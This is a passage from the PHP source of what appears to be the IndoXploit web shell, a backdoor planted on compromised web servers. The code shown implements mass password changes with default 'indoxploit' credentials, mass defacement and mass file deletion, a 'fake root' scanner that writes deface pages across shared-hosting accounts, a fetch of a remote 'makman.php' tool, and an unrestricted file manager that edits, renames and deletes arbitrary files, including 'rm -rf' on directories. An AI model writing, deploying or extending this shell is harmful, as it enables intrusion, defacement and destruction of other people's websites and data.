1554 print "Status => ".color(1, 2, "sukses edit user, silakan login dengan user & pass yang baru.")."<br><br>";
1555 }
1556 mysql_close($conn);
1557 }
1558 }
1559 }
1560 }
1561 else {
1562 print "<center>
1563 <h1>Mass Password Change</h1>
1564 <form method='post'>
1565 <input type='radio' name='config_type' value='dir' checked>DIR Config<input type='radio' name='config_type' value='link'>LINK Config<br>
1566 <input type='text' size='50' name='config_dir' value='".path()."'><br><br>
1567 Set User & Pass: <br>
1568 <input type='text' name='user_baru' value='indoxploit' placeholder='user_baru'><br>
1569 <input type='text' name='pass_baru' value='indoxploit' placeholder='pass_baru'><br>
1570 <input style='background: transparent; color: #ffffff; border: 1px solid #ffffff; width: 215px; margin: 5px auto;' type='submit' name='hajar' value='Hajar!'>
1571 </form></center>";
1572 }
1573 }
1574 elseif($_GET['do'] === "mass") {
1575 if($_POST['start']) {
1576 if($_POST['mass_type'] === 'singledir') {
1577 print "<div style='margin: 5px auto; padding: 5px'>";
1578 massdeface($_POST['d_dir'], $_POST['script'], $_POST['d_file']);
1579 print "</div>";
1580 }
1581 elseif($_POST['mass_type'] === 'alldir') {
1582 print "<div style='margin: 5px auto; padding: 5px'>";
1583 massdeface($_POST['d_dir'], $_POST['script'], $_POST['d_file'], "-alldir");
1584 print "</div>";
1585 }
1586 elseif($_POST['mass_type'] === "delete") {
1587 print "<div style='margin: 5px auto; padding: 5px'>";
1588 massdelete($_POST['d_dir'], $_POST['d_file']);
1589 print "</div>";
1590 }
1591 }
1592 else {
1593 print "<center><form method='post'>
1594 <font style='text-decoration: underline;'>Tipe Sabun:</font><br>
1595 <input type='radio' name='mass_type' value='singledir' checked>Mass Deface Single Directory<input type='radio' name='mass_type' value='alldir'>Mass Deface All Directory<input type='radio' name='mass_type' value='delete'>Mass Delete File<br>
1596 <span>( kosongkan 'Index File' jika memilih Mass Delete File )</span><br><br>
1597 <font style='text-decoration: underline;'>Folder:</font><br>
1598 <input type='text' name='d_dir' value='".path()."' style='width: 450px;' height='10'><br><br>
1599 <font style='text-decoration: underline;'>Filename:</font><br>
1600 <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br><br>
1601 <font style='text-decoration: underline;'>Index File:</font><br>
1602 <textarea name='script' style='width: 450px; height: 200px;'>Hacked by IndoXploit</textarea><br>
1603 <input style='background: transparent; color: #ffffff; border: 1px solid #ffffff; width: 460px; margin: 5px auto;' type='submit' name='start' value='Mass'>
1604 </form></center>";
1605 }
1606 }
1607 elseif($_GET['do'] == 'fakeroot') {
1608 ob_start();
1609
1610 $site = explode("\r\n", $_POST['url']);
1611 $user = usergroup()->name;
1612 $file = $_POST['file'];
1613
1614 if(!preg_match("#/home/$user/public_html#", $_SERVER['DOCUMENT_ROOT'])) die(color(1, 1, "I think this server not using shared host :("));
1615
1616
1617 if($_POST['reverse']) {
1618 if(!is_writable($_SERVER['DOCUMENT_ROOT'])) die(color(1, 1, "Directory '".$_SERVER['DOCUMENT_ROOT']."' is not writeable."));
1619 if(!is_writable(dirname($_SERVER['DOCUMENT_ROOT']))) die(color(1, 1, "Directory '".dirname($_SERVER['DOCUMENT_ROOT'])."' is not writeable."));
1620
1621 save($_SERVER['DOCUMENT_ROOT']."/".$file, "w", $_POST['script']);
1622 save(dirname($_SERVER['DOCUMENT_ROOT'])."/".$file, "w", $_POST['script']);
1623
1624 foreach($site as $url) {
1625 $cek = curl("$url/~$user/$file");
1626 if(preg_match("/hacked/i", $cek)) {
1627 print "URL: <a href='$url/~$user/$file' target='_blank'>$url/~$user/$file</a> -> <font color=lime>Fake Root!</font><br>";
1628 }
1629 }
1630 } else {
1631 print "<center><form method='post'>
1632 Filename: <br><input type='text' name='file' value='deface.html' size='50' height='10'><br>
1633 User: <br><input type='text' value='$user' size='50' height='10' readonly><br>
1634 Domain: <br>
1635 <textarea style='width: 450px; height: 250px;' name='url'>";
1636 print implode("\n", reverse());
1637 print "</textarea><br>
1638 <font style='text-decoration: underline;'>Index File:</font><br>
1639 <textarea name='script' style='width: 450px; height: 200px;'>Hacked by IndoXploit</textarea><br>
1640 <input style='background: transparent; color: #ffffff; border: 1px solid #ffffff; width: 460px; margin: 5px auto;' type='submit' name='reverse' value='Scan Fake Root!'>
1641 </form><br>
1642 NB: Sebelum gunain Tools ini , upload dulu file deface kalian di dir /home/user/ dan /home/user/public_html.</center>";
1643 }
1644 }
1645 elseif($_GET['do'] === 'lre') {
1646 if(file_exists("makman.php")) {
1647 print "<iframe src='http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/makman.php' frameborder='0' scrolling='yes'></iframe>";
1648 }
1649 else {
1650 if(!is_writable(path())) die(color(1, 1, "Directory '".path()."' is not writeable. Can't create file 'Makman'."));
1651 if(getfile("LRE")) {
1652 print "<iframe src='http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/makman.php' frameborder='0' scrolling='yes'></iframe>";
1653 }
1654 else {
1655 print color(1, 1, "Error while downloading file makman.");
1656 @unlink("makman.php");
1657 }
1658 }
1659
1660 }
1661 }
1662 elseif(isset($_GET['act'])) {
1663 if($_GET['act'] === 'newfile') {
1664 if($_POST['save']) {
1665 $filename = htmlspecialchars($_POST['filename']);
1666 $fopen = fopen($filename, "a+");
1667 if($fopen) {
1668 $act = "<script>window.location='?act=edit&dir=".path()."&file=".$_POST['filename']."';</script>";
1669 }
1670 else {
1671 $act = color(1, 1, "Permission Denied!");
1672 }
1673 }
1674 print $act;
1675 print "<form method='post'>
1676 Filename: <input type='text' name='filename' value='".path()."/newfile.php' style='width: 450px;' height='10'>
1677 <input type='submit' class='input' name='save' value='SUBMIT'>
1678 </form>";
1679 }
1680 elseif($_GET['act'] === 'newfolder') {
1681 if($_POST['save']) {
1682 $foldername = path().'/'.htmlspecialchars($_POST['foldername']);
1683 if(!@mkdir($foldername)) {
1684 $act = color(1, 1, "Permission Denied!");
1685 }
1686 else {
1687 $act = "<script>window.location='?dir=".path()."';</script>";
1688 }
1689 }
1690 print $act;
1691 print "<form method='post'>
1692 Folder Name: <input type='text' name='foldername' style='width: 450px;' height='10'>
1693 <input type='submit' class='input' name='save' value='SUBMIT'>
1694 </form>";
1695 }
1696 elseif($_GET['act'] === 'rename_folder') {
1697 if($_POST['save']) {
1698 $rename_folder = rename(path(), "".dirname(path()).DIRECTORY_SEPARATOR.htmlspecialchars($_POST['foldername']));
1699 if($rename_folder) {
1700 $act = "<script>window.location='?dir=".dirname(path())."';</script>";
1701 }
1702 else {
1703 $act = color(1, 1, "Permission Denied!");
1704 }
1705 print "$act<br>";
1706 }
1707 print "<form method='post'>
1708 <input type='text' value='".basename(path())."' name='foldername' style='width: 450px;' height='10'>
1709 <input type='submit' class='input' name='save' value='RENAME'>
1710 </form>";
1711 }
1712 elseif($_GET['act'] === 'delete_folder') {
1713 if(is_dir(path())) {
1714 if(is_writable(path())) {
1715 @rmdir(path());
1716 if(!@rmdir(path()) AND OS() === "Linux") @exe("rm -rf ".path());
1717 if(!@rmdir(path()) AND OS() === "Windows") @exe("rmdir /s /q ".path());
1718 $act = "<script>window.location='?dir=".dirname(path())."';</script>";
1719 }
1720 else {
1721 $act = color(1, 1, "Could not remove directory '".basename(path())."'");
1722 }
1723 }
1724 print $act;
1725 }
1726 elseif($_GET['act'] === 'view') {
1727 print "Filename: ".color(1, 2, basename($_GET['file']))." [".writeable($_GET['file'], perms($_GET['file']))."]<br>";
1728 print "[ <a href='?act=view&dir=".path()."&file=".$_GET['file']."'><b>view</b></a> ] [ <a href='?act=edit&dir=".path()."&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=".path()."&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=".path()."&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=".path()."&file=".$_GET['file']."'>delete</a> ]<br>";
1729 print "<textarea readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea>";
1730 }
1731 elseif($_GET['act'] === 'edit') {
1732 if($_POST['save']) {
1733 $save = file_put_contents($_GET['file'], $_POST['src']);
1734 if($save) {
1735 $act = color(1, 2, "File Saved!");
1736 }
1737 else {
1738 $act = color(1, 1, "Permission Denied!");
1739 }
1740 print "$act<br>";
1741 }
1742
1743 print "Filename: ".color(1, 2, basename($_GET['file']))." [".writeable($_GET['file'], perms($_GET['file']))."]<br>";
1744 print "[ <a href='?act=view&dir=".path()."&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=".path()."&file=".$_GET['file']."'><b>edit</b></a> ] [ <a href='?act=rename&dir=".path()."&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=".path()."&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=".path()."&file=".$_GET['file']."'>delete</a> ]<br>";
1745 print "<form method='post'>
1746 <textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
1747 <input type='submit' class='input' value='SAVE' name='save' style='width: 500px;'>
1748 </form>";
1749 }
1750 elseif($_GET['act'] === 'rename') {
1751 if($_POST['save']) {
1752 $rename = rename($_GET['file'], path().DIRECTORY_SEPARATOR.htmlspecialchars($_POST['filename']));
1753 if($rename) {
1754 $act = "<script>window.location='?dir=".path()."';</script>";
1755 }
1756 else {
1757 $act = color(1, 1, "Permission Denied!");
1758 }
1759 print "$act<br>";
1760 }
1761
1762 print "Filename: ".color(1, 2, basename($_GET['file']))." [".writeable($_GET['file'], perms($_GET['file']))."]<br>";
1763 print "[ <a href='?act=view&dir=".path()."&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=".path()."&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=".path()."&file=".$_GET['file']."'><b>rename</b></a> ] [ <a href='?act=download&dir=".path()."&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=".path()."&file=".$_GET['file']."'>delete</a> ]<br>";
1764 print "<form method='post'>
1765 <input type='text' value='".basename($_GET['file'])."' name='filename' style='width: 450px;' height='10'>
1766 <input type='submit' class='input' name='save' value='RENAME'>
1767 </form>";
1768 }
1769 elseif($_GET['act'] === 'delete') {
1770 $delete = unlink($_GET['file']);
1771 if($delete) {
1772 $act = "<script>window.location='?dir=".path()."';</script>";
1773 }
1774 else {
1775 $act = color(1, 1, "Permission Denied!");
1776 }
1777 print $act;
1778 }
1779 }
1780 else {
1781 files_and_folder();
1782 }
1783}
1784
1785serverinfo();
1786action();
1787?>
1788</body>
1789</html>